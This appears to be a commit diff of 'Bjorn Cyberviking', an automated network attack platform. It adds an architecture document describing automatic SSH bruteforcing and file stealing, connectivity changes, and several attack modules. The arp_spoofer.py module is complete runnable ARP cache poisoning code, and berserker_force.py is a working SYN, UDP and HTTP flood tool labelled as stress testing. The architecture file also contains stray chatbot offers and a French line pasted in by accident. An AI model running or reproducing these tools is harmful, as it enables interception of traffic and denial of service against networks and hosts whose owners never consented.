5 Commits

929 changed files with 110901 additions and 9750 deletions

148
ARCHITECTURE.md Normal file
View File

@@ -0,0 +1,148 @@
# Bjorn Cyberviking Architecture
This document describes the internal workings of **Bjorn Cyberviking**.
> The architecture is designed to be **modular and asynchronous**, using multi-threading to handle the display, web interface, and cyber-security operations (scanning, attacks) simultaneously.
-----
## 1\. High-Level Overview
The system relies on a **"Producer-Consumer"** model orchestrated around shared memory and a central database.
### System Data Flow
* **User / WebUI**: Interacts with the `WebApp`, which uses `WebUtils` to read/write to the **SQLite DB**.
* **Kernel (Main Thread)**: `Bjorn.py` initializes the `SharedData` (global state in RAM).
* **Brain (Logic)**:
* **Scheduler**: Plans actions based on triggers and writes them to the DB.
* **Orchestrator**: Reads the queue from the DB, executes scripts from `/actions`, and updates results in the DB.
* **Output (Display)**: `Display.py` reads the current state from `SharedData` and renders it to the E-Paper Screen.
-----
## 2\. Core Components
### 2.1. The Entry Point (`Bjorn.py`)
This is the global conductor.
* **Role**: Initializes components, manages the application lifecycle, and handles stop signals.
* **Workflow**:
1. Loads configuration via `SharedData`.
2. Starts the display thread (`Display`).
3. Starts the web server thread (`WebApp`).
4. **Network Monitor**: As soon as an interface (Wi-Fi/Eth) is active, it starts the **Orchestrator** thread (automatic mode). If the network drops, it can pause the orchestrator.
### 2.2. Central Memory (`shared.py`)
This is the backbone of the program.
* **Role**: Stores the global state of Bjorn, accessible by all threads.
* **Content**:
* **Configuration**: Loaded from the DB (`config`).
* **Runtime State**: Current status (`IDLE`, `SCANNING`...), displayed text, indicators (wifi, bluetooth, battery).
* **Resources**: File paths, fonts, images loaded into RAM.
* **Singleton DB**: A unique instance of `BjornDatabase` to avoid access conflicts.
### 2.3. Persistent Storage (`database.py`)
A facade (wrapper) for **SQLite**.
* **Architecture**: Delegates specific operations to sub-modules (in `db_utils/`) to keep the code clean (e.g., `HostOps`, `QueueOps`, `VulnerabilityOps`).
* **Role**: Ensures persistence of discovered hosts, vulnerabilities, the action queue, and logs.
-----
## 3\. The Operational Core: Scheduler vs Orchestrator
This is where Bjorn's "intelligence" lies. The system separates **decision** from **action**.
### 3.1. The Scheduler (`action_scheduler.py`)
*It "thinks" but does not act.*
* **Role**: Analyzes the environment and populates the queue (`action_queue`).
* **Logic**:
* It loops regularly to check **Triggers** defined in actions (e.g., `on_new_host`, `on_open_port:80`, `on_interval:600`).
* If a condition is met (e.g., a new PC is discovered), it inserts the corresponding action into the database with the status `pending`.
* It manages priorities and avoids duplicates.
### 3.2. The Orchestrator (`orchestrator.py`)
*It acts but does not deliberate on strategic consequences.*
* **Role**: Consumes the queue.
* **Logic**:
1. Requests the next priority action (`pending`) from the DB.
2. Dynamically loads the corresponding Python module from the `/actions` folder (via `importlib`).
3. Executes the `run()` or `execute()` method of the action.
4. Updates the result (`success`/`failed`) in the DB.
5. Updates the status displayed on the screen (via `SharedData`).
-----
## 4\. User Interface
### 4.1. E-Ink Display (`display.py` & `epd_manager.py`)
* **EPD Manager**: `epd_manager.py` is a singleton handling low-level hardware access (SPI) to prevent conflicts and manage hardware timeouts.
* **Rendering**: `display.py` constructs the image in memory (**PIL**) by assembling:
* Bjorn's face (based on current status).
* Statistics (skulls, lightning bolts, coins).
* The "catchphrase" (generated by `comment.py`).
* **Optimization**: Uses partial refresh to avoid black/white flashing, except for periodic maintenance.
### 4.2. Web Interface (`webapp.py`)
* **Server**: A custom multi-threaded `http.server` (no heavy frameworks like Flask/Django to ensure lightness).
* **Architecture**:
* API requests are dynamically routed to `WebUtils` (`utils.py`).
* The frontend communicates primarily in **JSON**.
* Handles authentication and GZIP compression of assets.
### 4.3. The Commentator (`comment.py`)
Provides Bjorn's personality. It selects phrases from the database based on context (e.g., *"Bruteforcing SSH..."*) and the configured language, with a weighting and delay system to avoid spamming.
-----
Voici la section mise à jour avec le flux logique pour une attaque SSH sur le port 22 :
***
## 5. Typical Data Flow (Example)
Here is what happens when Bjorn identifies a vulnerable service:
1. **Scanning (Action)**: The Orchestrator executes a scan. It discovers IP `192.168.1.50` has **port 22 (SSH) open**.
2. **Storage**: The scanner saves the host and port status to the DB.
3. **Reaction (Scheduler)**: In the next cycle, the `ActionScheduler` detects the open port. It checks actions that have the `on_open_port:22` trigger.
4. **Planning**: It adds the `SSHBruteforce` action to the `action_queue` for this IP.
5. **Execution (Orchestrator)**: The Orchestrator finishes its current task, sees the `SSHBruteforce` in the queue, picks it up, and starts the dictionary attack.
6. **Feedback (Display)**: `SharedData` is updated. The screen displays *"Cracking 192.168.1.50"* with the corresponding face.
7. **Web**: The user sees the attack attempt and real-time logs on the web dashboard.
***
**Would you like me to create a diagram to illustrate this specific attack flow?**
-----
## 6\. Folder Structure
Although not provided here, the architecture implies this structure:
```text
/
├── Bjorn.py # Root program entry
├── orchestrator.py # Action consumer
├── shared.py # Shared memory
├── actions/ # Python modules containing attack/scan logic (dynamically loaded)
├── data/ # Stores bjorn.db and logs
├── web/ # HTML/JS/CSS files for the interface
└── resources/ # Images, fonts (.bmp, .ttf)
```
-----
**Would you like me to generate a Mermaid.js diagram code block (Flowchart) to visualize the Scheduler/Orchestrator loop described in section 3?**

View File

@@ -1,26 +1,11 @@
# bjorn.py
# This script defines the main execution flow for the Bjorn application. It initializes and starts
# various components such as network scanning, display, and web server functionalities. The Bjorn
# class manages the primary operations, including initiating network scans and orchestrating tasks.
# The script handles startup delays, checks for Wi-Fi connectivity, and coordinates the execution of
# scanning and orchestrator tasks using semaphores to limit concurrent threads. It also sets up
# signal handlers to ensure a clean exit when the application is terminated.
# Functions:
# - handle_exit: handles the termination of the main and display threads.
# - handle_exit_webserver: handles the termination of the web server thread.
# - is_wifi_connected: Checks for Wi-Fi connectivity using the nmcli command.
# The script starts by loading shared data configurations, then initializes and sta
# bjorn.py
import threading
import signal
import logging
import time
import sys
import subprocess
import re
from init_shared import shared_data
from display import Display, handle_exit_display
from comment import Commentaireia
@@ -37,6 +22,9 @@ class Bjorn:
self.commentaire_ia = Commentaireia()
self.orchestrator_thread = None
self.orchestrator = None
self.network_connected = False
self.wifi_connected = False
self.previous_network_connected = None # Pour garder une trace de l'état précédent
def run(self):
"""Main loop for Bjorn. Waits for Wi-Fi connection and starts Orchestrator."""
@@ -51,11 +39,9 @@ class Bjorn:
self.check_and_start_orchestrator()
time.sleep(10) # Main loop idle waiting
def check_and_start_orchestrator(self):
"""Check Wi-Fi and start the orchestrator if connected."""
if self.is_wifi_connected():
if self.is_network_connected():
self.wifi_connected = True
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
self.start_orchestrator()
@@ -65,7 +51,8 @@ class Bjorn:
def start_orchestrator(self):
"""Start the orchestrator thread."""
self.is_wifi_connected() # reCheck if Wi-Fi is connected before starting the orchestrator
self.is_network_connected() # reCheck if Wi-Fi is connected before starting the orchestrator
# time.sleep(10) # Wait for network to stabilize
if self.wifi_connected: # Check if Wi-Fi is connected before starting the orchestrator
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
logger.info("Starting Orchestrator thread...")
@@ -78,7 +65,7 @@ class Bjorn:
else:
logger.info("Orchestrator thread is already running.")
else:
logger.warning("Cannot start Orchestrator: Wi-Fi is not connected.")
pass
def stop_orchestrator(self):
"""Stop the orchestrator thread."""
@@ -89,17 +76,47 @@ class Bjorn:
self.shared_data.orchestrator_should_exit = True
self.orchestrator_thread.join()
logger.info("Orchestrator thread stopped.")
self.shared_data.bjornorch_status = "IDLE"
self.shared_data.bjornstatustext2 = ""
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.manual_mode = True
else:
logger.info("Orchestrator thread is not running.")
def is_wifi_connected(self):
"""Checks for Wi-Fi connectivity using the nmcli command."""
result = subprocess.Popen(['nmcli', '-t', '-f', 'active', 'dev', 'wifi'], stdout=subprocess.PIPE, text=True).communicate()[0]
self.wifi_connected = 'yes' in result
return self.wifi_connected
def is_network_connected(self):
"""Checks for network connectivity on eth0 or wlan0 using ip command (replacing deprecated ifconfig)."""
logger = logging.getLogger("Bjorn.py")
def interface_has_ip(interface_name):
try:
# Use 'ip -4 addr show <interface>' to check for IPv4 address
result = subprocess.run(
['ip', '-4', 'addr', 'show', interface_name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
if result.returncode != 0:
return False
# Check if output contains "inet" which indicates an IP address
return 'inet' in result.stdout
except Exception:
return False
eth_connected = interface_has_ip('eth0')
wifi_connected = interface_has_ip('wlan0')
self.network_connected = eth_connected or wifi_connected
if self.network_connected != self.previous_network_connected:
if self.network_connected:
logger.info(f"Network is connected (eth0={eth_connected}, wlan0={wifi_connected}).")
else:
logger.warning("No active network connections found.")
self.previous_network_connected = self.network_connected
return self.network_connected
@staticmethod
@@ -124,9 +141,7 @@ def handle_exit(sig, frame, display_thread, bjorn_thread, web_thread):
if web_thread.is_alive():
web_thread.join()
logger.info("Main loop finished. Clean exit.")
sys.exit(0) # Used sys.exit(0) instead of exit(0)
sys.exit(0)
if __name__ == "__main__":
logger.info("Starting threads")

View File

@@ -42,6 +42,8 @@ The e-Paper HAT display and web interface make it easy to monitor and interact w
- **File Stealing**: Extracts data from vulnerable services.
- **User Interface**: Real-time display on the e-Paper HAT and web interface for monitoring and interaction.
[![Architecture](https://img.shields.io/badge/ARCHITECTURE-Read_Docs-ff69b4?style=for-the-badge&logo=github)](./ARCHITECTURE.md)
![Bjorn Display](https://github.com/infinition/Bjorn/assets/37984399/bcad830d-77d6-4f3e-833d-473eadd33921)
## 🚀 Getting Started

1237
action_scheduler.py Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -1,15 +1,9 @@
#Test script to add more actions to BJORN
from rich.console import Console
from shared import SharedData
b_class = "IDLE"
b_module = "idle_action"
b_status = "idle_action"
b_port = None
b_parent = None
b_module = "idle"
b_status = "IDLE"
console = Console()
class IDLE:
def __init__(self, shared_data):

Binary file not shown.

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 29 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 114 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 162 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 34 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 33 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 175 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 25 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 178 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 185 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 138 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 70 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 76 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.2 MiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 172 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 181 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 221 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 181 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 154 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 172 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 159 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 155 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 172 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 137 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 30 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 30 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 27 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 24 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

163
actions/arp_spoofer.py Normal file
View File

@@ -0,0 +1,163 @@
# AARP Spoofer by poisoning the ARP cache of a target and a gateway.
# Saves settings (target, gateway, interface, delay) in `/home/bjorn/.settings_bjorn/arpspoofer_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target IP address of the target device (overrides saved value).
# -g, --gateway IP address of the gateway (overrides saved value).
# -i, --interface Network interface (default: primary or saved).
# -d, --delay Delay between ARP packets in seconds (default: 2 or saved).
# - First time: python arpspoofer.py -t TARGET -g GATEWAY -i INTERFACE -d DELAY
# - Subsequent: python arpspoofer.py (uses saved settings).
# - Update: Provide any argument to override saved values.
import os
import json
import time
import argparse
from scapy.all import ARP, send, sr1, conf
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_enabled = 0
# Folder and file for settings
SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(SETTINGS_DIR, "arpspoofer_settings.json")
class ARPSpoof:
def __init__(self, target_ip, gateway_ip, interface, delay):
self.target_ip = target_ip
self.gateway_ip = gateway_ip
self.interface = interface
self.delay = delay
conf.iface = self.interface # Set the interface
print(f"ARPSpoof initialized with target IP: {self.target_ip}, gateway IP: {self.gateway_ip}, interface: {self.interface}, delay: {self.delay}s")
def get_mac(self, ip):
"""Gets the MAC address of a target IP by sending an ARP request."""
print(f"Retrieving MAC address for IP: {ip}")
try:
arp_request = ARP(pdst=ip)
response = sr1(arp_request, timeout=2, verbose=False)
if response:
print(f"MAC address found for {ip}: {response.hwsrc}")
return response.hwsrc
else:
print(f"No ARP response received for IP {ip}")
return None
except Exception as e:
print(f"Error retrieving MAC address for {ip}: {e}")
return None
def spoof(self, target_ip, spoof_ip):
"""Sends an ARP packet to spoof the target into believing the attacker's IP is the spoofed IP."""
print(f"Preparing ARP spoofing for target {target_ip}, pretending to be {spoof_ip}")
target_mac = self.get_mac(target_ip)
spoof_mac = self.get_mac(spoof_ip)
if not target_mac or not spoof_mac:
print(f"Cannot find MAC address for target {target_ip} or {spoof_ip}, spoofing aborted")
return
try:
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=spoof_mac)
send(arp_response, verbose=False)
print(f"Spoofed ARP packet sent to {target_ip} claiming to be {spoof_ip}")
except Exception as e:
print(f"Error sending ARP packet to {target_ip}: {e}")
def restore(self, target_ip, spoof_ip):
"""Sends an ARP packet to restore the legitimate IP/MAC mapping for the target and spoof IP."""
print(f"Restoring ARP association for {target_ip} using {spoof_ip}")
target_mac = self.get_mac(target_ip)
gateway_mac = self.get_mac(spoof_ip)
if not target_mac or not gateway_mac:
print(f"Cannot restore ARP, MAC addresses not found for {target_ip} or {spoof_ip}")
return
try:
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=gateway_mac)
send(arp_response, verbose=False, count=5)
print(f"ARP association restored between {spoof_ip} and {target_mac}")
except Exception as e:
print(f"Error restoring ARP association for {target_ip}: {e}")
def execute(self):
"""Executes the ARP spoofing attack."""
try:
print(f"Starting ARP Spoofing attack on target {self.target_ip} via gateway {self.gateway_ip}")
while True:
target_mac = self.get_mac(self.target_ip)
gateway_mac = self.get_mac(self.gateway_ip)
if not target_mac or not gateway_mac:
print(f"Error retrieving MAC addresses, stopping ARP Spoofing")
self.restore(self.target_ip, self.gateway_ip)
self.restore(self.gateway_ip, self.target_ip)
break
print(f"Sending ARP packets to poison {self.target_ip} and {self.gateway_ip}")
self.spoof(self.target_ip, self.gateway_ip)
self.spoof(self.gateway_ip, self.target_ip)
time.sleep(self.delay)
except KeyboardInterrupt:
print("Attack interrupted. Restoring ARP tables.")
self.restore(self.target_ip, self.gateway_ip)
self.restore(self.gateway_ip, self.target_ip)
print("ARP Spoofing stopped and ARP tables restored.")
except Exception as e:
print(f"Unexpected error during ARP Spoofing attack: {e}")
def save_settings(target, gateway, interface, delay):
"""Saves the ARP spoofing settings to a JSON file."""
try:
os.makedirs(SETTINGS_DIR, exist_ok=True)
settings = {
"target": target,
"gateway": gateway,
"interface": interface,
"delay": delay
}
with open(SETTINGS_FILE, 'w') as file:
json.dump(settings, file)
print(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
print(f"Failed to save settings: {e}")
def load_settings():
"""Loads the ARP spoofing settings from a JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as file:
return json.load(file)
except Exception as e:
print(f"Failed to load settings: {e}")
return {}
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ARP Spoofing Attack Script")
parser.add_argument("-t", "--target", help="IP address of the target device")
parser.add_argument("-g", "--gateway", help="IP address of the gateway")
parser.add_argument("-i", "--interface", default=conf.iface, help="Network interface to use (default: primary interface)")
parser.add_argument("-d", "--delay", type=float, default=2, help="Delay between ARP packets in seconds (default: 2 seconds)")
args = parser.parse_args()
# Load saved settings and override with CLI arguments
settings = load_settings()
target_ip = args.target or settings.get("target")
gateway_ip = args.gateway or settings.get("gateway")
interface = args.interface or settings.get("interface")
delay = args.delay or settings.get("delay")
if not target_ip or not gateway_ip:
print("Target and Gateway IPs are required. Use -t and -g or save them in the settings file.")
exit(1)
# Save the settings for future use
save_settings(target_ip, gateway_ip, interface, delay)
# Execute the attack
spoof = ARPSpoof(target_ip=target_ip, gateway_ip=gateway_ip, interface=interface, delay=delay)
spoof.execute()

315
actions/berserker_force.py Normal file
View File

@@ -0,0 +1,315 @@
# Resource exhaustion testing tool for network and service stress analysis.
# Saves settings in `/home/bjorn/.settings_bjorn/berserker_force_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target Target IP or hostname to test.
# -p, --ports Ports to test (comma-separated, default: common ports).
# -m, --mode Test mode (syn, udp, http, mixed, default: mixed).
# -r, --rate Packets per second (default: 100).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/stress).
import os
import json
import argparse
from datetime import datetime
import logging
import threading
import time
import queue
import socket
import random
import requests
from scapy.all import *
import psutil
from collections import defaultdict
b_class = "BerserkerForce"
b_module = "berserker_force"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stress"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "berserker_force_settings.json")
DEFAULT_PORTS = [21, 22, 23, 25, 80, 443, 445, 3306, 3389, 5432]
class BerserkerForce:
def __init__(self, target, ports=None, mode='mixed', rate=100, output_dir=DEFAULT_OUTPUT_DIR):
self.target = target
self.ports = ports or DEFAULT_PORTS
self.mode = mode
self.rate = rate
self.output_dir = output_dir
self.active = False
self.lock = threading.Lock()
self.packet_queue = queue.Queue()
self.stats = defaultdict(int)
self.start_time = None
self.target_resources = {}
def monitor_target(self):
"""Monitor target's response times and availability."""
while self.active:
try:
for port in self.ports:
try:
start_time = time.time()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(1)
result = s.connect_ex((self.target, port))
response_time = time.time() - start_time
with self.lock:
self.target_resources[port] = {
'status': 'open' if result == 0 else 'closed',
'response_time': response_time
}
except:
with self.lock:
self.target_resources[port] = {
'status': 'error',
'response_time': None
}
time.sleep(1)
except Exception as e:
logging.error(f"Error monitoring target: {e}")
def syn_flood(self):
"""Generate SYN flood packets."""
while self.active:
try:
for port in self.ports:
packet = IP(dst=self.target)/TCP(dport=port, flags="S",
seq=random.randint(0, 65535))
self.packet_queue.put(('syn', packet))
with self.lock:
self.stats['syn_packets'] += 1
time.sleep(1/self.rate)
except Exception as e:
logging.error(f"Error in SYN flood: {e}")
def udp_flood(self):
"""Generate UDP flood packets."""
while self.active:
try:
for port in self.ports:
data = os.urandom(1024) # Random payload
packet = IP(dst=self.target)/UDP(dport=port)/Raw(load=data)
self.packet_queue.put(('udp', packet))
with self.lock:
self.stats['udp_packets'] += 1
time.sleep(1/self.rate)
except Exception as e:
logging.error(f"Error in UDP flood: {e}")
def http_flood(self):
"""Generate HTTP flood requests."""
while self.active:
try:
for port in [80, 443]:
if port in self.ports:
protocol = 'https' if port == 443 else 'http'
url = f"{protocol}://{self.target}"
# Randomize request type
request_type = random.choice(['get', 'post', 'head'])
try:
if request_type == 'get':
requests.get(url, timeout=1)
elif request_type == 'post':
requests.post(url, data=os.urandom(1024), timeout=1)
else:
requests.head(url, timeout=1)
with self.lock:
self.stats['http_requests'] += 1
except:
with self.lock:
self.stats['http_errors'] += 1
time.sleep(1/self.rate)
except Exception as e:
logging.error(f"Error in HTTP flood: {e}")
def packet_sender(self):
"""Send packets from the queue."""
while self.active:
try:
if not self.packet_queue.empty():
packet_type, packet = self.packet_queue.get()
send(packet, verbose=False)
with self.lock:
self.stats['packets_sent'] += 1
else:
time.sleep(0.1)
except Exception as e:
logging.error(f"Error sending packet: {e}")
def calculate_statistics(self):
"""Calculate and update testing statistics."""
duration = time.time() - self.start_time
stats = {
'duration': duration,
'packets_per_second': self.stats['packets_sent'] / duration,
'total_packets': self.stats['packets_sent'],
'syn_packets': self.stats['syn_packets'],
'udp_packets': self.stats['udp_packets'],
'http_requests': self.stats['http_requests'],
'http_errors': self.stats['http_errors'],
'target_resources': self.target_resources
}
return stats
def save_results(self):
"""Save test results and statistics."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'timestamp': datetime.now().isoformat(),
'configuration': {
'target': self.target,
'ports': self.ports,
'mode': self.mode,
'rate': self.rate
},
'statistics': self.calculate_statistics()
}
output_file = os.path.join(self.output_dir, f"stress_test_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def start(self):
"""Start stress testing."""
self.active = True
self.start_time = time.time()
threads = []
# Start monitoring thread
monitor_thread = threading.Thread(target=self.monitor_target)
monitor_thread.start()
threads.append(monitor_thread)
# Start sender thread
sender_thread = threading.Thread(target=self.packet_sender)
sender_thread.start()
threads.append(sender_thread)
# Start attack threads based on mode
if self.mode in ['syn', 'mixed']:
syn_thread = threading.Thread(target=self.syn_flood)
syn_thread.start()
threads.append(syn_thread)
if self.mode in ['udp', 'mixed']:
udp_thread = threading.Thread(target=self.udp_flood)
udp_thread.start()
threads.append(udp_thread)
if self.mode in ['http', 'mixed']:
http_thread = threading.Thread(target=self.http_flood)
http_thread.start()
threads.append(http_thread)
return threads
def stop(self):
"""Stop stress testing."""
self.active = False
self.save_results()
def save_settings(target, ports, mode, rate, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"target": target,
"ports": ports,
"mode": mode,
"rate": rate,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Resource exhaustion testing tool")
parser.add_argument("-t", "--target", help="Target IP or hostname")
parser.add_argument("-p", "--ports", help="Ports to test (comma-separated)")
parser.add_argument("-m", "--mode", choices=['syn', 'udp', 'http', 'mixed'],
default='mixed', help="Test mode")
parser.add_argument("-r", "--rate", type=int, default=100, help="Packets per second")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
args = parser.parse_args()
settings = load_settings()
target = args.target or settings.get("target")
ports = [int(p) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS)
mode = args.mode or settings.get("mode")
rate = args.rate or settings.get("rate")
output_dir = args.output or settings.get("output_dir")
if not target:
logging.error("Target is required. Use -t or save it in settings")
return
save_settings(target, ports, mode, rate, output_dir)
berserker = BerserkerForce(
target=target,
ports=ports,
mode=mode,
rate=rate,
output_dir=output_dir
)
try:
threads = berserker.start()
logging.info(f"Stress testing started against {target}")
while True:
time.sleep(1)
except KeyboardInterrupt:
logging.info("Stopping stress test...")
berserker.stop()
for thread in threads:
thread.join()
if __name__ == "__main__":
main()

234
actions/demo_action.py Normal file
View File

@@ -0,0 +1,234 @@
# demo_action.py
# Demonstration Action: wrapped in a DemoAction class
# ---------------------------------------------------------------------------
# Metadata (compatible with sync_actions / Neo launcher)
# ---------------------------------------------------------------------------
b_class = "DemoAction"
b_module = "demo_action"
b_enabled = 1
b_action = "normal" # normal | aggressive | stealth
b_category = "demo"
b_name = "Demo Action"
b_description = "Demonstration action: simply prints the received arguments."
b_author = "Template"
b_version = "0.1.0"
b_icon = "demo_action.png"
b_examples = [
{
"profile": "quick",
"interface": "auto",
"target": "192.168.1.10",
"port": 80,
"protocol": "tcp",
"verbose": True,
"timeout": 30,
"concurrency": 2,
"notes": "Quick HTTP scan"
},
{
"profile": "deep",
"interface": "eth0",
"target": "example.org",
"port": 443,
"protocol": "tcp",
"verbose": False,
"timeout": 120,
"concurrency": 8,
"notes": "Deep TLS profile"
}
]
b_docs_url = "docs/actions/DemoAction.md"
# ---------------------------------------------------------------------------
# UI argument schema
# ---------------------------------------------------------------------------
b_args = {
"profile": {
"type": "select",
"label": "Profile",
"choices": ["quick", "balanced", "deep"],
"default": "balanced",
"help": "Choose a profile: speed vs depth."
},
"interface": {
"type": "select",
"label": "Network Interface",
"choices": [],
"default": "auto",
"help": "'auto' tries to detect the default network interface."
},
"target": {
"type": "text",
"label": "Target (IP/Host)",
"default": "192.168.1.1",
"placeholder": "e.g. 192.168.1.10 or example.org",
"help": "Main target."
},
"port": {
"type": "number",
"label": "Port",
"min": 1,
"max": 65535,
"step": 1,
"default": 80
},
"protocol": {
"type": "select",
"label": "Protocol",
"choices": ["tcp", "udp"],
"default": "tcp"
},
"verbose": {
"type": "checkbox",
"label": "Verbose output",
"default": False
},
"timeout": {
"type": "slider",
"label": "Timeout (seconds)",
"min": 5,
"max": 600,
"step": 5,
"default": 60
},
"concurrency": {
"type": "range",
"label": "Concurrency",
"min": 1,
"max": 32,
"step": 1,
"default": 4,
"help": "Number of parallel tasks (demo only)."
},
"notes": {
"type": "text",
"label": "Notes",
"default": "",
"placeholder": "Free-form comments",
"help": "Free text field to demonstrate a simple string input."
}
}
# ---------------------------------------------------------------------------
# Dynamic detection of interfaces
# ---------------------------------------------------------------------------
import os
try:
import psutil
except Exception:
psutil = None
def _list_net_ifaces() -> list[str]:
names = set()
if psutil:
try:
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
except Exception:
pass
try:
for n in os.listdir("/sys/class/net"):
if n and n != "lo":
names.add(n)
except Exception:
pass
out = ["auto"] + sorted(names)
seen, unique = set(), []
for x in out:
if x not in seen:
unique.append(x)
seen.add(x)
return unique
def compute_dynamic_b_args(base: dict) -> dict:
d = dict(base or {})
if "interface" in d:
d["interface"]["choices"] = _list_net_ifaces() or ["auto", "eth0", "wlan0"]
if d["interface"].get("default") not in d["interface"]["choices"]:
d["interface"]["default"] = "auto"
return d
# ---------------------------------------------------------------------------
# DemoAction class
# ---------------------------------------------------------------------------
import argparse
class DemoAction:
"""Wrapper called by the orchestrator."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.meta = {
"class": b_class,
"module": b_module,
"enabled": b_enabled,
"action": b_action,
"category": b_category,
"name": b_name,
"description": b_description,
"author": b_author,
"version": b_version,
"icon": b_icon,
"examples": b_examples,
"docs_url": b_docs_url,
"args_schema": b_args,
}
def execute(self, ip=None, port=None, row=None, status_key=None):
"""Called by the orchestrator. This demo only prints arguments."""
self.shared_data.bjorn_orch_status = "DemoAction"
self.shared_data.comment_params = {"ip": ip, "port": port}
print("=== DemoAction :: executed ===")
print(f" IP/Target: {ip}:{port}")
print(f" Row: {row}")
print(f" Status key: {status_key}")
print("No real action performed: demonstration only.")
return "success"
def run(self, argv=None):
"""Standalone CLI mode for testing."""
parser = argparse.ArgumentParser(description=b_description)
parser.add_argument("--profile", choices=b_args["profile"]["choices"],
default=b_args["profile"]["default"])
parser.add_argument("--interface", default=b_args["interface"]["default"])
parser.add_argument("--target", default=b_args["target"]["default"])
parser.add_argument("--port", type=int, default=b_args["port"]["default"])
parser.add_argument("--protocol", choices=b_args["protocol"]["choices"],
default=b_args["protocol"]["default"])
parser.add_argument("--verbose", action="store_true",
default=bool(b_args["verbose"]["default"]))
parser.add_argument("--timeout", type=int, default=b_args["timeout"]["default"])
parser.add_argument("--concurrency", type=int, default=b_args["concurrency"]["default"])
parser.add_argument("--notes", default=b_args["notes"]["default"])
args = parser.parse_args(argv)
print("=== DemoAction :: received parameters ===")
for k, v in vars(args).items():
print(f" {k:11}: {v}")
print("\n=== Demo usage of parameters ===")
if args.verbose:
print("[verbose] Verbose mode enabled → simulated detailed logs...")
if args.profile == "quick":
print("Profile: quick → would perform fast operations.")
elif args.profile == "deep":
print("Profile: deep → would perform longer, more thorough operations.")
else:
print("Profile: balanced → compromise between speed and depth.")
print(f"Target: {args.target}:{args.port}/{args.protocol} via {args.interface}")
print(f"Timeout: {args.timeout} sec, Concurrency: {args.concurrency}")
print("No real action performed: demonstration only.")
if __name__ == "__main__":
DemoAction(shared_data=None).run()

175
actions/dns_pillager.py Normal file
View File

@@ -0,0 +1,175 @@
# DNS Pillager for reconnaissance and enumeration of DNS infrastructure.
# Saves settings in `/home/bjorn/.settings_bjorn/dns_pillager_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -d, --domain Target domain for enumeration (overrides saved value).
# -w, --wordlist Path to subdomain wordlist (default: built-in list).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/dns).
# -t, --threads Number of threads for scanning (default: 10).
